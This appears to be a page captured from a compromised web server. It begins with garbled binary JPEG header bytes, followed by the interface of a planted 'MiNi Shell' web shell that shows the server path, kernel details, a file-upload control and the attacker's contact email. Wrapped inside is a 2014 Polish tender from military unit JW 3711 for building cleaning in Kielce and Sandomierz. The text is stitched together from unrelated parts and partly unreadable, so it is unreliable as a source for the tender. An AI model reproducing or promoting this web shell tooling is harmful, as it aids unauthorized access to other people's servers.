JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141125/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141125/386596-N-2014.html

<p class="kh_header"><b>Nowa Dęba: Usługa utrzymania czystości w budynkach</b><br>
<b>Numer ogłoszenia: 386596 - 2014; data zamieszczenia: 25.11.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 3711 , ul. Anieli Krzywoń 1, 39-460 Nowa Dęba, woj. podkarpackie, tel. 15 816 22 06, faks 15 816 22 06.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.33wog.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa utrzymania czystości w budynkach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie Nr 1 - KIELCE
kompl. 3345 ul. Wojska Polskiego 300, 
kompl. 3347 ul. Chęcińska 2, 
kompl. 3830 ul. Bohaterów Warszawy 10,
kompl. 4727 ul. Wesoła 29,
kompl. 8117 ul. Sobieskiego 20,
kompl. 7155 Suków

I . Specyfika wykonywanych usług (sprzątanie 3 razy w tygodniu w dni robocze - pomieszczenia biurowe, ciągi komunikacyjne, sanitariaty, natomiast pomieszczenia pokoi noclegowych, wydzielone pomieszczenia o pow. 443 w bud.nr1, jadalni oraz kontenerów sanitarnych i biurowych w zakresie:
1)Zamiatanie podłóg, zarówno w pomieszczeniach biurowych, jak i klatkach schodowych, korytarzach, holach  3 razy w tygodniu.
2)Mycie podłóg na mokro  3 razy w tygodniu. 
3)Odkurzanie, dywanów i wykładzin podłogowych  3 razy w tygodniu.
4)Mycie terakoty, fliz, lamperii  1 raz w tygodniu.
5)Wycieranie z kurzu (na mokro) parapetów okiennych  1 raz w tygodniu.
6)Wycieranie na wilgotno kurzu z boazerii, paneli, listew ściennych  1 raz               w tygodniu 
7)Czyszczenie i wycieranie kurzu z powierzchni biurek, szaf, szafek i innego sprzętu biurowego, za wyjątkiem sprzętu komputerowego  3 razy w tygodniu. 
8)Konserwacja i nabłyszczanie odpowiednimi środkami posadzek marmurowych, kamiennych, PCV, drewnianych, płytek gressowych, itp.  1 raz w miesiącu
9)Pastowanie i froterowanie posadzek wymagających stosowania tego zabiegu (rodzaj zabiegu musi być dostosowany do określonego rodzaju podłogi)  1 raz w miesiącu
10)Mycie stolarki drzwiowej oraz kaloryferów  1 raz w miesiącu.
11)Czyszczenie klamek i innych elementów  1 raz w miesiącu.
12)Czyszczenie gniazdek, wyłączników, itp.  1 raz w miesiącu.
13)Przecieranie na mokro sprzętu ppoż. (gaśnice, itp.)  1 raz w miesiącu.
14)Czyszczenie poręczy i balustrad  1 raz w miesiącu.
15)Mycie opraw oświetleniowych - (klosze, obudowy) i kratek wentylacyjnych 1 raz w miesiącu.
16)Wycieranie na mokro kurzu i zanieczyszczeń z elementów wyposażenia pomieszczeń (lodówek, kuchenek gazowych, elektrycznych)  3 razy w tygodniu. 
17)Mycie blatów, szafek (z zewnątrz) - 3 razy w tygodniu, krzeseł  2 razy           w tygodniu
18)Pranie firan i zasłon  zakres usługi obejmuje  zdjęcie firan  i zasłon do prania oraz zawieszenie po wykonanej usłudze prania 2 razy w roku (przy myciu okien po zimie i jesienią); Wykonanie usługi nie może trwać dłużej niż 96 godzin od momentu zdjęcia firan i zasłon.
19)Czyszczenie verticali 1 raz w czasie trwania umowy
20)Mycie otworów okiennych (szyb i ram okiennych od wewnątrz i z zewnątrz), technika mycia powinna być dostosowana do rodzaju okien  inna w przypadku okien wykonanych z PCV, drewna  2 razy w roku (po wcześniejszym uzgodnieniu             z użytkownikiem obiektu).
21)Opróżnianie koszy na śmieci do pojemników znajdujących się na zewnątrz budynków, a także czyszczenie koszy oraz wyposażanie ich w worki foliowe na odpady  wg potrzeb.
22)Opróżnianie koszy na śmieci (czyszczenie oraz wyposażanie w worki foliowe) znajdujących się na zewnątrz budynków  wg potrzeb
23)Opróżnianie i czyszczenie popielniczek  wg potrzeb.
24)Czyszczenie urządzeń, glazury łazienkowej i armatury sanitarnej w pomieszczeniach WC, kabin sanitarnych, natrysków   1 razy w tygodniu 
25)Czyszczenie glazury ściennej w pomieszczeniach Izby chorych środkami odkażającymi 1 raz w miesiącu 
26)Mycie płytek ściennych (glazury) w pomieszczeniach WC oraz aneksach kuchennych, jak również innych pomieszczeniach ogólnodostępnych przedstawionych  w zestawieniu powierzchni  1 raz w tygodniu 
27)Sprzątanie i dezynfekcja toalet  3 razy w tygodniu 
28)Usuwanie rdzy i kamienia z urządzeń sanitarnych  3 razy w tygodniu 
29)Czyszczenie terakoty  3 raz w tygodniu 
30)Mycie luster wiszących  3 razy w tygodniu 
31)Usuwanie pajęczyn  wg potrzeb.
32)Sprzątanie palarni zewnętrznych 2 razy w tygodniu.

Zadanie Nr 2  SANDOMIERZ
kompl. 3394 ul. Mickiewicza 38 , 
kompl. 7587 ul. Puławiaków 12, 
kompl. 5490  Radoszki,

Szczegółowe zestawienie powierzchni do sprzątania stanowi załącznik nr 2.
 
I . Specyfika wykonywanych - zgodnie z załącznikiem nr 2 w zakresie:
1)Zamiatanie podłóg, zarówno w pomieszczeniach biurowych, jak i klatkach schodowych, korytarzach, holach 
2)Mycie podłóg na mokro 
3)Odkurzanie, dywanów i wykładzin podłogowych 
4)Mycie glazury, lamperii - 1raz w tygodniu.
5)Wycieranie z kurzu (na mokro) parapetów okiennych - 1 raz w tygodniu.
6)Wycieranie na wilgotno kurzu z boazerii, paneli, listew ściennych - 1 raz 
w tygodniu 
7)Czyszczenie i wycieranie kurzu z powierzchni biurek, szaf, szafek i innego sprzętu biurowego, za wyjątkiem sprzętu komputerowego - częstotliwość wg zał. nr 2 
8)Konserwacja i nabłyszczanie odpowiednimi środkami posadzek marmurowych, kamiennych, PCV, drewnianych, płytek gressowych, itp. - 1 raz w miesiącu
9)Pastowanie i froterowanie posadzek wymagających stosowania tego zabiegu (rodzaj zabiegu musi być dostosowany do określonego rodzaju podłogi) - 1 raz w miesiącu
10)Mycie stolarki drzwiowej oraz kaloryferów - 1 raz w miesiącu.
11)Czyszczenie klamek i innych elementów - 1 raz w miesiącu.
12)Czyszczenie gniazdek, wyłączników, itp. - 1 raz w miesiącu.
13)Przecieranie na mokro sprzętu ppoż. (gaśnice, itp.) - 1 raz w miesiącu.
14)Czyszczenie poręczy i balustrad - 1 raz w miesiącu.
15)Mycie opraw oświetleniowych - (klosze, obudowy) i kratek wentylacyjnych - 1 raz w miesiącu.
16)Wycieranie na mokro kurzu i zanieczyszczeń z elementów wyposażenia   
     pomieszczeń (lodówek, kuchenek gazowych, elektrycznych) - częstotliwość wg  
     zał. nr 2. 
17)Mycie blatów, szafek (z zewnątrz) - częstotliwość wg zał. nr 2. 
18)Pranie firan i zasłon - zakres usługi obejmuje  zdjęcie firan  i zasłon do prania oraz zawieszenie po wykonanej usłudze prania 2 razy w roku (przy myciu okien po  
     zimie i jesienią); Wykonanie usługi nie może trwać dłużej niż 96 godzin od  
     momentu zdjęcia firan i zasłon.
19)Czyszczenie verticali - 1 raz w czasie trwania umowy
20)Mycie otworów okiennych (szyb i ram okiennych od wewnątrz i z zewnątrz), 
     technika mycia powinna być dostosowana do rodzaju okien - inna w przypadku   
     okien wykonanych z PCV, drewna - 2 razy w roku (po wcześniejszym  
     uzgodnieniu z użytkownikiem obiektu).
21)Opróżnianie koszy na śmieci do pojemników znajdujących się na zewnątrz  
     budynków, a także czyszczenie koszy oraz wyposażanie ich w worki foliowe na  
     odpady - wg potrzeb.
22)Opróżnianie koszy na śmieci (czyszczenie oraz wyposażanie w worki foliowe) 
     znajdujących się na zewnątrz budynków do pojemników zbiorczych - wg potrzeb
23)Opróżnianie i czyszczenie popielniczek - wg potrzeb.
24)Czyszczenie urządzeń, glazury łazienkowej i armatury sanitarnej w  pomieszczeniach WC, kabin sanitarnych, natrysków -  wg potrzeb 
25)Sprzątanie i dezynfekcja toalet a  częstotliwość wg zał. nr 2. 
26)Usuwanie rdzy i kamienia z urządzeń sanitarnych a częstotliwość wg zał. nr 2. 
27)Czyszczenie terakoty a częstotliwość wg zał. nr 2. 
28)Mycie luster wiszących częstotliwość wg zał. nr 2. 
29)Usuwanie pajęczyn - wg potrzeb.
30)Sprzątanie palarni zewnętrznych - 2 razy w tygodniu..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.91.12.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.01.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Osoby wykonujące prace w pomieszczeniach zaliczanych do strefy ochronnej winny posiadać poświadczenie bezpieczeństwa zgodne z Rozporządzeniem Ministra Obrony Narodowej z dnia 2 listopada 2011r.

Opis sposobu dokonywania oceny spełniania tego warunku:
Zamawiający uzna warunek za spełniony na podstawie oświadczenia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga by Wykonawca w okresie trzech lat przed upływem terminu składania ofert, a jeśli okres działalności jest krótszy w tym okresie wykonał co najmniej 1 usługę sprzątania pomieszczeń użyteczności publicznej na kwotę przynajmniej: Zadanie 1 - 50 000,00 zł brutto; Zadanie 2 - 40 000,00 zł. 

Opis sposobu dokonywania oceny spełniania tego warunku:
- Zamawiający uzna warunek za spełniony na podstawie wykazu wykonanych,              a w przypadku świadczeń okresowych lub ciągłych również wykonywanych głównych usług sprzątania budynków w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeśli okres działalności jest krótszy w tym okresie, wraz z podaniem ich wartości, przedmiotu dat wykonania i podmiotów, na rzecz których usługi zostały wykonane. 
- Zamawiający uzna warunek za spełniony na podstawie minimum jednego dowodu (poświadczenia) na kwotę co najmniej 50 000,00 zł. dla zadania 1 oraz 40 000,00 zł. dla zadania 2 dotyczących świadczenia usług sprzątania pomieszczeń użyteczności publicznej potwierdzających, że świadczone usługi zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga by wykonawca dysponował aktualna polisą OC                        o wartości co najmniej: Zadanie nr 1: 100 000,00 zł, Zadanie nr 2: 80 000,00 zł.

Opis sposobu dokonywania oceny spełniania tego warunku:
Zamawiający uzna warunek za spełniony na podstawie polisy ubezpieczeniowej.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Zamawiający uzna warunek za spełniony na podstawie minimum jednego dowodu (poświadczenia) na kwotę co najmniej 50 000,00 zł. dla zadania 1 oraz 40 000,00 zł. dla zadania 2 dotyczących świadczenia usług sprzątania pomieszczeń użyteczności publicznej potwierdzających, że świadczone usługi zostały wykonane należycie.;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.33wog.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa 3711 z siedzibą ul. Anieli Krzywoń 1, 39-460 Nowa Dęba, fax(15) 816-22-06.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.12.2014 godzina 11:30, miejsce: Jednostka Wojskowa 3711 z siedzibą ul. Anieli Krzywoń 1, 39-460 Nowa Dęba, Kancelaria Jawna, (15) 816-22-04,.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com